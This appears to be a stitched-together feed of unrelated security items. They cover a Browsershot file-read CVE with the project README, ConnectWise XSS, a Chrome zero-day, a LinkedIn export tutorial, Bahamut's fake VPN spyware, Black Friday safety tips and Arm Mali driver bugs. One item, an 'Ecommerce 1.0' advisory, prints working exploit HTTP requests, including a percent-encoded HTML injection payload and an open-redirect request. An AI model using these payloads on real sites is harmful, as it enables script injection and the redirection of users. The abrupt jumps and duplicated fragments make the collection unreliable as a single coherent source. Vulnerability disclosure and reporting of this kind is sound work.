Browsershot version 3.57.2 allows an external attacker to remotely obtain arbitrary local files. This is possible because the application does not validate the URL protocol passed to the Browsershot::url method.

**Convert a webpage to an image or pdf using headless Chrome**

   

The package can convert a webpage to an image or pdf. The conversion is done behind the scenes by Puppeteer which controls a headless version of Google Chrome.

Here's a quick example:

use Spatie\\Browsershot\\Browsershot;

// an image will be saved
Browsershot::url('https://example.com')->save($pathToImage);

It will save a pdf if the path passed to the save method has a pdf extension.

// a pdf will be saved
Browsershot::url('https://example.com')->save('example.pdf');

You can also use an arbitrary html input, simply replace the url method with html:

Browsershot::html('<h1>Hello world!!</h1>')->save('example.pdf');

If your HTML input is already in a file locally use the :

Browsershot::htmlFromFilePath('/local/path/to/file.html')->save('example.pdf');

Browsershot also can get the body of an html page after JavaScript has been executed:

Browsershot::url('https://example.com')->bodyHtml(); // returns the html of the body

If you wish to retrieve an array list with all of the requests that the page triggered you can do so:

$requests = Browsershot::url('https://example.com')
    ->triggeredRequests();

foreach ($requests as $request) {
    $url = $request\['url'\]; //https://example.com/
}

**Support us**

Learn how to create a package like this one, by watching our premium video course:

We invest a lot of resources into creating best in class open source packages. You can support us by buying one of our paid products.

We highly appreciate you sending us a postcard from your hometown, mentioning which of our package(s) you are using. You'll find our address on our contact page. We publish all received postcards on our virtual postcard wall.

**Documentation**

All documentation is available on our documentation site.

**Contributing**

Please see CONTRIBUTING for details.

**Security**

If you've found a bug regarding security please mail security@spatie.be instead of using the issue tracker.

**Alternatives**

If you're not able to install Node and Puppeteer, take a look at v2 of browsershot, which uses Chrome headless CLI to take a screenshot. v2 is not maintained anymore, but should work pretty well.

If using headless Chrome does not work for you take a look at at v1 of this package which uses the abandoned PhantomJS binary.

**Credits**

*   Freek Van der Herten
*   All Contributors

And a special thanks to Caneco for the logo ✨

**License**

The MIT License (MIT). Please see License File for more information.

CVE-2022-41706: GitHub - spatie/browsershot: Convert HTML to an image, PDF or string

Researchers also applaud abandonment of customization feature abused by scammers

Adam Bannister 25 November 2022 at 15:00 UTC

Researchers also applaud abandonment of customization feature abused by scammers

A cross-site scripting (XSS) vulnerability in ConnectWise Control, the remote monitoring and management (RMM) platform, offered attackers a powerful attack vector for abusing remote access tools.

Now patched, the stored XSS flaw was disclosed by Guardio Labs, which in July published an analysis of tech support scams, a widespread phenomenon whereby scammers abuse RMM platforms in order to create fake technical support portals and dupe victims into inadvertently installing malware.

Once installed, a remote access tool gives attackers remote control of a victim’s desktop PC or mobile device and, said the report, “is persistent, mostly undetectable, and bypasses almost all regular forms of protection. And in a show of supreme chutzpah, these scammers even manipulate this capability to bypass 2FA protection and take full control of PayPal and bank accounts”.

Read more of the latest hacking tools news

A new technical write-up documenting the ConnectWise XSS explains how attackers could easily register for a free, anonymous email account and submit fake personal details. This would give them a corporate-grade remote access agent and support portal they could customize – with no coding skills needed – to convincingly mimic famous brands.

Scammers could then call and dupe victims by, for example, sending “them a fake invoice for some service they never registered to, urgently referring them to a \[…\] fake refund service portal to enter the ‘invoice’ code (triggering the dedicated silent \[remote access tool\] installation),” wrote Nati Tal, head of Guardio Labs.

**Full control**

The stored XSS bug arose from a lack of sanitation of the resource. “Any code we maliciously inject in between the tags with some manipulations is executed as any other code in the context of the webapp – as if was authored by the official owner of the service,” explains Tal.

“A script executing from this context gives an attacker full control over any element of the webapp, potentially altering any element of the page as well as connection to the backend servers,” contined Tal.

Scammers could also “abuse the hosting service itself – allowing misuse of ConnectWise hosting, identity, and certificate to serve malicious code or gain full access to admin pages even after the trial period is over.”

**‘Bold move’**

ConnectWise recently added a prominent advisory to its remote support service to alert visitors to this social engineering threat. However, Guardio Labs found that attackers could also execute code that removes this warning.

ConnectWise has since responded by removing the customization feature for trial accounts – “a bold move” that would prevent scammers from creating credible-looking Amazon or Microsoft support pages but at the cost of losing a useful feature and commercial differentiator, noted Tal. “They sure took this matter seriously which is very appreciated and will surely help make web browsing safer and the scammers’ life a bit harder,” he said.

“ConnectWise was very responsive and quickly fixed the issue” by adding sanitization to that neutralized Guardio’s exploit code, added the researcher.

Users are advised to update to version v22.6, released on August 8, 2022, or later.

YOU MIGHT ALSO LIKE Google Roulette: Developer console trick can trigger XSS in Chromium browsers

ConnectWise closes XSS vector for remote hijack scams

Google on Thursday released software updates to address yet another zero-day flaw in its Chrome web browser.
Tracked as CVE-2022-4135, the high-severity vulnerability has been described as a heap buffer overflow in the GPU component. Clement Lecigne of Google's Threat Analysis Group (TAG) has been credited with reporting the flaw on November 22, 2022.
Heap-based buffer overflow bugs can be

Google on Thursday released software updates to address yet another zero-day flaw in its Chrome web browser.

Tracked as **CVE-2022-4135**, the high-severity vulnerability has been described as a heap buffer overflow in the GPU component. Clement Lecigne of Google's Threat Analysis Group (TAG) has been credited with reporting the flaw on November 22, 2022.

Heap-based buffer overflow bugs can be weaponized by threat actors to crash a program or execute arbitrary code, leading to unintended behavior.

"Google is aware that an exploit for CVE-2022-4135 exists in the wild," the tech giant acknowledged in an advisory.

But like other actively exploited issues, technical specifics have been withheld until a majority of the users are updated with a fix and to prevent further abuse.

With the latest update, Google has resolved eight zero-day vulnerabilities in Chrome since the start of the year -

*   **CVE-2022-0609** - Use-after-free in Animation
*   **CVE-2022-1096** - Type confusion in V8
*   **CVE-2022-1364** - Type confusion in V8
*   **CVE-2022-2294** - Heap buffer overflow in WebRTC
*   **CVE-2022-2856** - Insufficient validation of untrusted input in Intents
*   **CVE-2022-3075** - Insufficient data validation in Mojo
*   **CVE-2022-3723** - Type confusion in V8

Users are recommended to upgrade to version 107.0.5304.121 for macOS and Linux and 107.0.5304.121/.122 for Windows to mitigate potential threats.

Users of Chromium-based browsers such as Microsoft Edge, Brave, Opera, and Vivaldi are also advised to apply the fixes as and when they become available.

Found this article interesting? Follow THN on Facebook, Twitter __ and LinkedIn to read more exclusive content we post.

Update Chrome Browser Now to Patch New Actively Exploited Zero-Day Flaw

Heap buffer overflow in GPU in Google Chrome prior to 107.0.5304.121 allowed a remote attacker who had compromised the renderer process to potentially perform a sandbox escape via a crafted HTML page. (Chromium security severity: High)

**Heap buffer overflow in GPU**

Critical severity GitHub Reviewed Published Nov 25, 2022 • Updated Nov 28, 2022

GHSA-995f-9x5r-2rcj: Heap buffer overflow in GPU

By Owais Sultan
One of the best things about LinkedIn is that it allows you to download a CSV file with…
This is a post from HackRead.com Read the original post: How to use Linked Helper 2 as a LinkedIn Data Export Tool

One of the best things about LinkedIn is that it allows you to download a CSV file with your first-degree connections information. This file, however, lacks the email and phone numbers of the profile.

However, provided your first-degree connection has provided this information on your LinkedIn, it can easily be obtained by Linked Helper 2. It is important to note that getting the phone numbers and emails of your second and third degree is impossible because LinkedIn does not grant you access to such information.

You can use Linked Helper 2 to export your first-degree connections on LinkedIn to a downloadable CSV file. In addition, Linked Helper 2 also gives you a chance to create a targeted mailing list. In this article, we will guide you step by step on how you can use Linked Helper as a LinkedIn data export tool.

We are going to walk you through the following steps;

*   Creation of a new campaign
*   Profile collection
*   Adjusting action configurations
*   Starting the Campaign
*   Downloading the CSV file

Let us dive in!

**1 Generate a new campaign using a template with preset commands**

To create a new campaign, open the Campaign menu and click the Create new command. A pop window will appear, requiring you to name your Campaign. The next step is selecting the type of Campaign you want. At this stage, pick **people** as the campaign type. After that, select the needed template, i.e., **Visit and Extract profiles.** Wrap up by clicking the **Create** button.

Here, the Campaign generated only has a single action. However, if more steps are needed, you can configure the Workflow and add more actions.

**2 Profile collection into your created Campaign**

Near the Campaign queue, locate and click the **Collect** button. You will then be prompted to provide the source of your profiles. Since we want to collect first-degree connection profiles, we will use **the My network page** as the source.

After collecting the profiles, you can also review them to check for errors.

**3 Fine-tune action configurations**

You can adjust action settings under the General tab. Here you can configure the action’s name and suspend the start of the action. After a profile has been processed through an activity, Linked Helper 2 can automatically remove or assign tags associated with the profile.

On the **Tags tab** under the action, enter a tag name and confirm it by pressing enter on your personal computer. Now proceed to the Display settings Tab, select Bunch, and fine-tune its size and the time between bunches.

**4 Start the Campaign**

Start the Campaign can quickly be done by clicking the **Start campaign** button on the left menu. You can also launch the Campaign by clicking the **Start** button at the topmost section of your screen.

As soon as the campaign launches, the Campaign’s status will change, and Linked Helper will display when the subsequent step is carried out. Linked Helper uses a green frame to highlight the Campaign being performed.

**5 Download CSV profiles**

Visited profiles are stored under the **Successful** sub-list by Linked Helper. To access them click the **Successful** command or **Campaign**, then **Workflow.** 

To download these profiles, first, click **the Select all** button to select all the profiles. Finish up by clicking **Download.** Remember to choose your delimiter, preferably Google Sheets or MS Excel.

1.  How to Use Excel to Scrape a Website
2.  Penetration Testing Azure: The User-Friendly Guide
3.  How to configure cPanel and WHM Panel on your VPS
4.  6 Best Ways to Make a Collaborative PowerPoint Presentation
5.  MySQL Performance Tuning: Top 5 Tips for Blazing Fast Queries

Owais takes care of Hackread's social media from the very first day. At the same time He is pursuing for chartered accountancy and doing part time freelance writing.

How to use Linked Helper 2 as a LinkedIn Data Export Tool

CVE-2022-4135: Stable Channel Update for Desktop

By Deeba Ahmed
Researchers believe that the attack is ongoing, in which hackers are using malicious versions of SoftVPN, SecureVPN, and OpenVPN software.
This is a post from HackRead.com Read the original post: Bahamut Using Fake VPN Apps to Steal Android User Credentials

Bahamut is a notorious cyber-mercenary group that has been active since 2016 and is currently targeting Android devices with fake VPN apps and injecting malware to steal user credentials. The malware-laden apps were first discovered by Slovakian cybersecurity firm ESET’s Lukáš Štefanko.

**Beware of Bahamut**

ESET researchers discovered a new attack spree from the infamous cybercrime group Bahamut. The group launched malware attacks through fake Android VPN applications. Research revealed that hackers use malicious versions of SoftVPN, SecureVPN, and OpenVPN software.

In this highly targeted campaign, hackers aim to extract sensitive data from infected devices. The campaign was started on January 22. The fake VPN apps are distributed through a bogus SecureVPN website. In previous campaigns from Bahamut, the prime targets were located in the Middle East and South Asia.

**8 Variants of Spyware Apps Detected**

Researchers have identified 8 different variants of the infected apps. These contain trojanized versions of genuine VPN apps such as OpenVPN. Bahamut is offering these fake VPN apps as a service for hire.

Malicious website spreading SecureVPN and the permission it asks for upon installation (Image: ESET)

According to ESET’s blog post, attacks are launched via spear phishing messages and fake apps. Researchers believe that this campaign is still active.

Reportedly, the targets are carefully selected because the app requires the victim to enter an activation key to enable the features using a distribution vector. The activation key is designed to establish contact with the attacker-controlled server and prevents the malware from accidentally triggering after it is launched on a non-targeted device.

**How does the Attack Works?**

According to Štefanko, the fake app requests an activation key before the VPN and spyware feature is enabled. The key and URL are sent to the targeted users. After the app is activated, the hackers get remote control of the spyware and can infiltrate/harvest confidential user data.

Furthermore, hackers can spy on almost everything stored on the device, including call logs, SMS messages, device location, WhatsApp data and other encryption app data, Telegram and Signal data, etc. The victim remains unaware of the data harvesting.

“The data exfiltration is done via the keylogging functionality of the malware, which misuses accessibility services,” Štefanko said.

It is worth noting that the malicious software linked with the service and the malware-infected app wasn’t promoted on Google Play. Moreover, researchers are clueless about the initial distribution vector, but they believe it is through social media, SMS, or email.

1.  Edward Snowden urges users to stop using ExpressVPN
2.  Popular free Android VPN apps on Play Store contain malware
3.  38% of Android VPN Apps on Play Store Plagued with Malware
4.  Top 10 Android Educational Apps That Collect Most User Data
5.  Hackers Selling US Colleges VPN Credentials on Russian Forums

Bahamut Using Fake VPN Apps to Steal Android User Credentials

Ecommerce version 1.0 suffers from cross site scripting and open redirection vulnerabilities.

    ## Title: Ecommerse-1.0 XSS-Reflected Hijack-credentials - JavaScript Injection## Author: nu11secur1ty## Date: 11.23.2022## Vendor: https://github.com/winston-dsouza## Software: https://github.com/winston-dsouza/ecommerce-website## Reference: https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/winston-dsouza/ecommerce-website## Description:The value of the eMail request parameter is copied into the value ofan HTML tag attribute which is encapsulated in double quotation marks.The attacker can trick the users of this system, very easy to visit avery dangerous link from anywhere, and then the game will over forthese customers.Also, the attacker can create a network from botnet computers by usingthis vulnerability.## STATUS: HIGH Vulnerability[+] Exploit00:```POSTPOST /ecommerce/index.php?error=If%20you%20lose%20your%20credentials%20information,%20please%20use%20our%20recovery%20webpage%20to%20recover%20your%20account.%20https://pornhub.comHTTP/1.1Host: pwnedhost.comAccept-Encoding: gzip, deflateAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Language: en-US;q=0.9,en;q=0.8User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.5304.107Safari/537.36Connection: closeCache-Control: max-age=0Cookie: PHPSESSID=td6bitb72h0e1nuqa4ft9q8e2fOrigin: http://pwnedhost.comUpgrade-Insecure-Requests: 1Referer: http://pwnedhost.com/ecommerce/index.phpContent-Type: application/x-www-form-urlencodedSec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="107", "Chromium";v="107"Sec-CH-UA-Platform: WindowsSec-CH-UA-Mobile: ?0Content-Length: 0```## Description01:JavaScript can be injected into the application response (a vulnerableapp - signup_script.php, no sanitizing submit function).The attacker can crash the MySQL server by sending large bites of POSTrequests to the MySQL server of this system.## STATUS: HIGH Vulnerability - CRITICAL## Real attack:[+] Exploit01:```POSTPOST /ecommerce/signup_script.php HTTP/1.1Host: pwnedhost.comAccept-Encoding: gzip, deflateAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Language: en-US;q=0.9,en;q=0.8User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.5304.107Safari/537.36Connection: closeCache-Control: max-age=0Cookie: PHPSESSID=td6bitb72h0e1nuqa4ft9q8e2fOrigin: http://pwnedhost.comUpgrade-Insecure-Requests: 1Referer: http://pwnedhost.com/ecommerce/index.phpContent-Type: application/x-www-form-urlencodedSec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="107", "Chromium";v="107"Sec-CH-UA-Platform: WindowsSec-CH-UA-Mobile: ?0Content-Length: 1070eMail=%3c%61%20%68%72%65%66%3d%22%68%74%74%70%73%3a%2f%2f%70%6f%72%6e%68%75%62%2e%63%6f%6d%2f%22%20%74%61%72%67%65%74%3d%22%5f%62%6c%61%6e%6b%22%20%72%65%6c%3d%22%6e%6f%6f%70%65%6e%65%72%20%6e%6f%66%6f%6c%6c%6f%77%20%75%67%63%22%3e%0a%3c%69%6d%67%20%73%72%63%3d%22%68%74%74%70%73%3a%2f%2f%63%64%6e%35%2d%63%61%70%72%69%6f%66%69%6c%65%73%2e%6e%65%74%64%6e%61%2d%73%73%6c%2e%63%6f%6d%2f%77%70%2d%63%6f%6e%74%65%6e%74%2f%75%70%6c%6f%61%64%73%2f%32%30%31%37%2f%30%37%2f%49%4d%47%5f%30%30%36%38%2e%67%69%66%3f%3f%74%6f%6b%65%6e%3d%47%48%53%41%54%30%41%41%41%41%41%41%42%58%57%47%53%4b%4f%48%37%4d%42%46%4c%45%4b%46%34%4d%36%59%33%59%43%59%59%4b%41%44%54%51%26%72%73%3d%31%22%20%73%74%79%6c%65%3d%22%62%6f%72%64%65%72%3a%31%70%78%20%73%6f%6c%69%64%20%62%6c%61%63%6b%3b%6d%61%78%2d%77%69%64%74%68%3a%31%30%30%25%3b%22%20%61%6c%74%3d%22%50%68%6f%74%6f%20%6f%66%20%42%79%72%6f%6e%20%42%61%79%2c%20%6f%6e%65%20%6f%66%20%41%75%73%74%72%61%6c%69%61%27%73%20%62%65%73%74%20%62%65%61%63%68%65%73%21%22%3e%0a%3c%2f%61%3e&password=s9L%21c7x%21E2&firstName=WoZykRqh&lastName=cqeMPJcJ```## Reproduce:[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/winston-dsouza/ecommerce-website)## Proof and Exploit:[href](https://streamable.com/3r4t36)## Real Exploit:[href](https://streamable.com/n3b5ev)## Real Exploit - code insert:[href](https://streamable.com/64dmo2)## Time spent`1:45`

Ecommerce 1.0 Cross Site Scripting / Open Redirect

'Tis the season for swindlers and hackers. Use these tips to spot frauds and keep your payment info secure.

Black Friday attracts crowds, and crowds attract scammers, and that means you need to take extra care when shopping online over the Black Friday and Cyber Monday weekend. There'll be people out there eager to relieve you of more money than you'll save on a TV set or a gaming console.

The following precautions apply any time of year, but it's worth reminding yourself of them every time a serious holiday season comes around. In the rush to get gifts sorted, it's all too easy to miss a warning sign, or get complacent about online security.

Update All Your Software

Keeping programs and operating systems up to date is important enough that Microsoft, Apple, Google, Mozilla, and all the other big names in tech now make it difficult for anyone to lag behind with their updates—most of the time you'll be prompted regularly to install new versions of your software, and it might even happen automatically in the background without you noticing.

The biggest retail event of the year has grown into an entire month of sales that ebb and flow. Here’s how to make the most of it.

Today's browsers, apps, and OSes are adept at spotting scams as they happen, whether it's phishing emails (designed to lure you to a fake shopping or banking site) or unauthorized logins on your accounts. To make the most of this built-in security, ensure you're running the latest versions across the board, which means the latest security patches—if you've been putting off updates on your phone or your computer, then get them done ahead of Black Friday.

If you do have a laptop that's too old to run the latest versions of Windows or macOS, avoid using it if possible—you'll be safer shopping on your phone, as long as it's running the most recent Android or iOS updates. On Android, you can check for updates via **System** and **System Update** in Settings; on iOS, it's **Settings** and then **General** and **Software Update**.

Be Wary of Email and Social Media Deals

You're likely to be inundated with special offers over email and social media this Black Friday, but be careful when it comes to clicking through on deals that come from suspicious sources (stores you've never shopped at before, for example). Always check that the link you clicked sent you to the website you were expecting to visit.

There's no hard and fast way to guarantee you'll never get caught out by a dodgy link (apart from just ignoring them all completely), but you can minimize the risk: Check that the social media account or email address sending the link is genuine, head to the site in question in a separate browser window to see whether you can find the same offer advertised, and be sure the offer you're looking at is the one that was promoted.

If your browser is up to date, as we mentioned above, dangerous links should be blocked before you reach them, but we'd still recommend being wary. You'll see some great offers advertised over social media and email, but no discount is worth the risk of exposing yourself to scammers.

Make sure all your devices are updated before shopping.

Android via David Nield

Do Your Research

Wherever possible, stick to trusted stores online. All the major players have robust security procedures in place, so the chances of them (and you) getting hacked are smaller. Still, if you're buying from any site, always check you're on the store website you think you are by checking in your browser's address bar.

We're not saying you should never shop at smaller outlets, but make sure they're using HTTPS technology (indicated with a padlock in your browser's address bar). Look for contact details, an office with a physical address, and reviews left by other users (Trustpilot can be helpful here). See if they're on Twitter and Facebook—and whether those accounts are actually active.

Debit and credit card issuers will usually protect you against fraud—check their policies online if you're not sure about yours—but nevertheless, keep an eye on your bank accounts throughout the Black Friday weekend to make sure only the amounts you're expecting to be debited are going out.

Double-Check Deals

Retailers change their prices all the time—especially online—so a "big discount" you see might only apply to whatever the price was last week, not what it's been over the course of the past year. Price trackers such as CamelCamelCamel can help you work out whether you're getting a genuine bargain or just something that was already heavily reduced.

Checking out product reviews on the web is a useful way of determining how current something is and how much you should be spending on it. Are you looking at the genuine article, or just a cheap knock-off? Is the gadget you're about to buy future-proofed with the latest tech or will it be out of date in six months? And (especially on Amazon) is it being sent from your current region or the other side of the world? Who's the actual seller? Make sure you read what previous buyers have to say via the user reviews before spending your money.

Just be aware that stores also use the occasion to try and shift their remaining stock of older, less popular products. Make sure you're looking at what you're buying and not just the price drop.

CamelCamelCamel will show you previous price drops on Amazon.

CamelCamelCamel via David Nield

Protect Your Accounts

As always, keep your accounts locked down and protected on Black Friday. Use strong, unique passwords for all your accounts (a dedicated password manager or your browser's password management system can help here), and turn on two-factor authentication on every account that offers it (Microsoft, Apple, Google, Facebook, and Twitter ones all do, for a start).

While it may seem convenient to quickly set up a new shopping account with your “usual” password, it only takes one account sharing the same password to get exposed, and all the others can come tumbling down after it. If you're using the latest versions of Chrome and Safari, you'll notice you can now use a strong password suggested by your browser (the option should pop up automatically when you're in a password field).

If you're planning on shopping at outlets where you haven't purchased anything before, it's a good idea to get these accounts set up ahead of time—this means you aren't rushing when it comes to thinking up new passwords and entering potentially sensitive information into your web browser.

Guard Your Payment Info

Many places that you're shopping at on Black Friday and Cyber Monday will already have your payment info on file, but if you're entering details into a new site, again make sure the padlock symbol is showing in the address bar—the full URL should also begin “https://”, which indicates that your payment details will be encrypted in transit.

If you’re on vacation or out of town, we recommend waiting until you get back home before buying anything—or at least using the cellular data on your phone to make a connection rather than a public Wi-Fi hotspot, as it's much harder for hackers to intercept your details (or look over your shoulder as you're typing them). If you are shopping in-store, be careful to guard your PIN numbers and other sensitive details when you're surrounded by crowds—or even just one shop assistant.

As tempting as Black Friday offers might be, it's usually a good idea to shop in as few places as possible, if you can: The fewer companies that hold your payment data, the less likely you are to be victim to a data breach, and the risk of those breaches are really down to the company's security policies rather than any precautions you can take.

How to Avoid Black Friday Scams Online

A set of five medium-severity security flaws in Arm's Mali GPU driver has continued to remain unpatched on Android devices for months, despite fixes released by the chipmaker.
Google Project Zero, which discovered and reported the bugs, said Arm addressed the shortcomings in July and August 2022.
"These fixes have not yet made it downstream to affected Android devices (including Pixel, Samsung,

A set of five medium-severity security flaws in Arm's Mali GPU driver has continued to remain unpatched on Android devices for months, despite fixes released by the chipmaker.

Google Project Zero, which discovered and reported the bugs, said Arm addressed the shortcomings in July and August 2022.

"These fixes have not yet made it downstream to affected Android devices (including Pixel, Samsung, Xiaomi, Oppo, and others)," Project Zero researcher Ian Beer said in a report. "Devices with a Mali GPU are currently vulnerable."

The vulnerabilities, collectively tracked under the identifiers CVE-2022-33917 (CVSS score: 5.5) and CVE-2022-36449 (CVSS score: 6.5), concern a case of improper memory processing, thereby allowing a non-privileged user to gain access to freed memory.

The second flaw, CVE-2022-36449, can be further weaponized to write outside of buffer bounds and disclose details of memory mappings, according to an advisory issued by Arm. The list of affected drivers is below -

**CVE-2022-33917**

*   Valhall GPU Kernel Driver: All versions from r29p0 - r38p0

**CVE-2022-36449**

*   Midgard GPU Kernel Driver: All versions from r4p0 – r32p0
*   Bifrost GPU Kernel Driver: All versions from r0p0 – r38p0, and r39p0
*   Valhall GPU Kernel Driver: All versions from r19p0 – r38p0, and r39p0

The findings once again highlight how patch gaps can render millions of devices vulnerable at once and put them at risk of heightened exploitation by threat actors.

"Just as users are recommended to patch as quickly as they can once a release containing security updates is available, so the same applies to vendors and companies," Beer said.

"Companies need to remain vigilant, follow upstream sources closely, and do their best to provide complete patches to users as soon as possible."

Found this article interesting? Follow THN on Facebook, Twitter __ and LinkedIn to read more exclusive content we post.

Tag

#google